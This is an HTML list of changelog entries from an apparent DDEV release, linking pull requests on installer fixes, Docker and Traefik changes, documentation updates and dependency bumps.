<li>fix: Attempt to resolve windows installer problems with 'Failed to copy script', fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3262939610" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7485" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7485/hovercard" href="https://github.com/ddev/ddev/issues/7485">#7485</a>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="8624911" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/discussions/7477" data-hovercard-type="discussion" data-hovercard-url="/ddev/ddev/discussions/7477/hovercard" href="https://github.com/orgs/ddev/discussions/7477">#7477</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3273637837" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7493" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7493/hovercard" href="https://github.com/ddev/ddev/pull/7493">#7493</a></li>
<li>docs: explain how to make <code>build</code> stage in <code>docker-compose.*.yaml</code> work offline by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3257192758" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7480" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7480/hovercard" href="https://github.com/ddev/ddev/pull/7480">#7480</a></li>
<li>feat: extend Traefik healthcheck to validate file routers and config errors, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2449233554" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6463" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6463/hovercard" href="https://github.com/ddev/ddev/issues/6463">#6463</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2535615699" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6553" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6553/hovercard" href="https://github.com/ddev/ddev/issues/6553">#6553</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3220168344" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7442" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7442/hovercard" href="https://github.com/ddev/ddev/pull/7442">#7442</a></li>
<li>feat: parallel <code>docker-compose pull</code>, improve <code>ddev debug download-images</code>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2956861749" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7163" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7163/hovercard" href="https://github.com/ddev/ddev/issues/7163">#7163</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3260508004" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7483" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7483/hovercard" href="https://github.com/ddev/ddev/pull/7483">#7483</a></li>
<li>test: ngrok broke their installation moving to bookworm, fix it by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3284642286" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7501" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7501/hovercard" href="https://github.com/ddev/ddev/pull/7501">#7501</a></li>
<li>build: use ddev/ddev-utilities instead of busybox, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3284310649" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7499" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7499/hovercard" href="https://github.com/ddev/ddev/issues/7499">#7499</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3284564571" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7500" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7500/hovercard" href="https://github.com/ddev/ddev/pull/7500">#7500</a></li>
<li>fix: Update obsolete WSL2 install scripts to reflect new ddev-wsl2 and not needing ddev.exe, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3244099732" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7464" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7464/hovercard" href="https://github.com/ddev/ddev/issues/7464">#7464</a> [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3252819184" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7474" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7474/hovercard" href="https://github.com/ddev/ddev/pull/7474">#7474</a></li>
<li>ci: enforce conventional commits format for PR titles [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3294571886" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7513" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7513/hovercard" href="https://github.com/ddev/ddev/pull/7513">#7513</a></li>
<li>docs(claude): enhance CLAUDE.md with GitHub workflow guidance [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3282036910" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7497" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7497/hovercard" href="https://github.com/ddev/ddev/pull/7497">#7497</a></li>
<li>docs(wsl): add <code>wsl --update</code> command for Windows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adiati98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adiati98">@adiati98</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3254098957" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7476" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7476/hovercard" href="https://github.com/ddev/ddev/pull/7476">#7476</a></li>
<li>refactor: add svg to rewrite rule for TYPO3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dhuf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dhuf">@dhuf</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3260387579" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7482" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7482/hovercard" href="https://github.com/ddev/ddev/pull/7482">#7482</a></li>
<li>ci(pr-check): loosen start and middle rules for message [skip ci], for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3294571886" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7513" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7513/hovercard" href="https://github.com/ddev/ddev/pull/7513">#7513</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3300518843" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7515" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7515/hovercard" href="https://github.com/ddev/ddev/pull/7515">#7515</a></li>
<li>feat(sponsorship): add ability to download sponsorship data and other generic data, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2782574881" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6892" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6892/hovercard" href="https://github.com/ddev/ddev/issues/6892">#6892</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3285407689" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7502" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7502/hovercard" href="https://github.com/ddev/ddev/pull/7502">#7502</a></li>
<li>chore: revert 3 github copilot commits that it (I) shouldn't have done [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3302084163" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7517" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7517/hovercard" href="https://github.com/ddev/ddev/pull/7517">#7517</a></li>
<li>fix(ddev-hostname): sudo can't find ddev-hostname in linuxbrew, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3293316717" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7510" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7510/hovercard" href="https://github.com/ddev/ddev/issues/7510">#7510</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3294479176" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7512" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7512/hovercard" href="https://github.com/ddev/ddev/pull/7512">#7512</a></li>
<li>chore(localdev): add path management to .envrc [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3301757484" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7516" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7516/hovercard" href="https://github.com/ddev/ddev/pull/7516">#7516</a></li>
<li>fix(traefik): improve router port discovery and optimize YAML writes, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3285777167" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev-mongo/issues/24" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev-mongo/issues/24/hovercard" href="https://github.com/ddev/ddev-mongo/issues/24">ddev/ddev-mongo#24</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3289620309" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7507" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7507/hovercard" href="https://github.com/ddev/ddev/pull/7507">#7507</a></li>
<li>build(deps): bump actions/checkout from 4 to 5 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3311702418" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7521" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7521/hovercard" href="https://github.com/ddev/ddev/pull/7521">#7521</a></li>
<li>build(direnv): Make direnv .envrc idempotent so it doesn't do all that work all the time by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3307534737" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7520" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7520/hovercard" href="https://github.com/ddev/ddev/pull/7520">#7520</a></li>
<li>build(mariadb): turn off innodb_use_native_aio for mariadb:10.6 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3320004569" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7525" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7525/hovercard" href="https://github.com/ddev/ddev/pull/7525">#7525</a></li>
<li>refactor: replace <code>docker context</code> with <code>docker/cli</code> library, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2140580271" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5862" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5862/hovercard" href="https://github.com/ddev/ddev/issues/5862">#5862</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2539187699" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6557" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6557/hovercard" href="https://github.com/ddev/ddev/issues/6557">#6557</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2974049378" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7189" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7189/hovercard" href="https://github.com/ddev/ddev/pull/7189">#7189</a></li>
<li>fix(testddevexportdb): postgres:14 output dump statement was suddenly more than 80 characters from end by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3323762068" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7528" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7528/hovercard" href="https://github.com/ddev/ddev/pull/7528">#7528</a></li>
<li>feat: replace <code>docker run</code> in <code>ddev auth ssh</code> with Docker API and accept stdin by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3293531327" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7511" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7511/hovercard" href="https://github.com/ddev/ddev/pull/7511">#7511</a></li>
<li>docs: enhance CLAUDE.md development workflow documentation [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3328863173" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7532" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7532/hovercard" href="https://github.com/ddev/ddev/pull/7532">#7532</a></li>
<li>feat(tools): consolidate development tool installations into unified script [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3324089500" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7530" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7530/hovercard" href="https://github.com/ddev/ddev/pull/7530">#7530</a></li>
<li>docs(troubleshooting): add more links to mutagen troubleshooting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3323918054" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7529" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7529/hovercard" href="https://github.com/ddev/ddev/pull/7529">#7529</a></li>
<li>fix: make ddev describe work correctly with new Docker Desktop, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3316133537" data-permission-text="Title is private" data-url="https://github.com/docker/for-mac/issues/7742" data-hovercard-type="issue" data-hovercard-url="/docker/for-mac/issues/7742/hovercard" href="https://github.com/docker/for-mac/issues/7742">docker/for-mac#7742</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3325219675" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7531" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7531/hovercard" href="https://github.com/ddev/ddev/pull/7531">#7531</a></li>
<li>build: add optional notarization skip via DISABLE_NOTARIZATION variable [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3330930149" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7534" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7534/hovercard" href="https://github.com/ddev/ddev/pull/7534">#7534</a></li>
<li>build(webserver): add <code>*_PROXY</code> and <code>DDEV_*</code> env for sudo; testing docs, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3186033902" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7413" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7413/hovercard" href="https://github.com/ddev/ddev/issues/7413">#7413</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3330967280" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7535" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7535/hovercard" href="https://github.com/ddev/ddev/pull/7535">#7535</a></li>
<li>refactor(docker): suppress any output (stdout, stderr) from docker/cli, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2974049378" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7189" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7189/hovercard" href="https://github.com/ddev/ddev/pull/7189">#7189</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3331480451" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7536" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7536/hovercard" href="https://github.com/ddev/ddev/pull/7536">#7536</a></li>
<li>feat: Upsun support for PLATFORM_APP and PLATFORM_PRIMARY_RELATIONSHIP by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3212917274" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7437" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7437/hovercard" href="https://github.com/ddev/ddev/pull/7437">#7437</a></li>
<li>feat: add Linux support for heidisql command by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/punkrock34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/punkrock34">@punkrock34</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3175289326" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7399" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7399/hovercard" href="https://github.com/ddev/ddev/pull/7399">#7399</a></li>
<li>fix(backdrop): Fix nginx config for routes conflicting with directories, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3281966625" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7495" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7495/hovercard" href="https://github.com/ddev/ddev/issues/7495">#7495</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3282002130" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7496" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7496/hovercard" href="https://github.com/ddev/ddev/pull/7496">#7496</a></li>
<li>fix(pantheon): update Pantheon database pull to get fresh DB and file push to be CMS-agnostic, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1829595175" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/5215" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/5215/hovercard" href="https://github.com/ddev/ddev/issues/5215">#5215</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1627492558" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/4760" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/4760/hovercard" href="https://github.com/ddev/ddev/issues/4760">#4760</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/danny2p/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/danny2p">@danny2p</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3266115981" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7486" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7486/hovercard" href="https://github.com/ddev/ddev/pull/7486">#7486</a></li>
<li>docs: fiddle with sponsorship title [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3338944829" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7540" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7540/hovercard" href="https://github.com/ddev/ddev/pull/7540">#7540</a></li>
<li>fix: quote DDEV_PRIMARY_URL expansion in launch script to handle empty values, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3196498757" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7424" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7424/hovercard" href="https://github.com/ddev/ddev/issues/7424">#7424</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3342090694" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7548" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7548/hovercard" href="https://github.com/ddev/ddev/pull/7548">#7548</a></li>
<li>fix: add mutagen sync flush after XHProf enable to prevent intermittent test failures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3339236069" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7543" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7543/hovercard" href="https://github.com/ddev/ddev/pull/7543">#7543</a></li>
<li>chore(deps): bump docker-compose to v2.39.2, remove <code>COMPOSE_BAKE=false</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3340715425" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7545" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7545/hovercard" href="https://github.com/ddev/ddev/pull/7545">#7545</a></li>
<li>feat: add ddev version to ddev describe command, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3171781898" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7398" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7398/hovercard" href="https://github.com/ddev/ddev/issues/7398">#7398</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tomasnorre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tomasnorre">@tomasnorre</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3339105714" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7541" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7541/hovercard" href="https://github.com/ddev/ddev/pull/7541">#7541</a></li>
<li>docs: add sponsorship banner to documentation, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2782574881" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6892" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6892/hovercard" href="https://github.com/ddev/ddev/issues/6892">#6892</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3345259311" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7551" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7551/hovercard" href="https://github.com/ddev/ddev/pull/7551">#7551</a></li>
<li>docs: Use docs.ddev.com instead of ddev.readthedocs.io by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3346751278" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7552" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7552/hovercard" href="https://github.com/ddev/ddev/pull/7552">#7552</a></li>
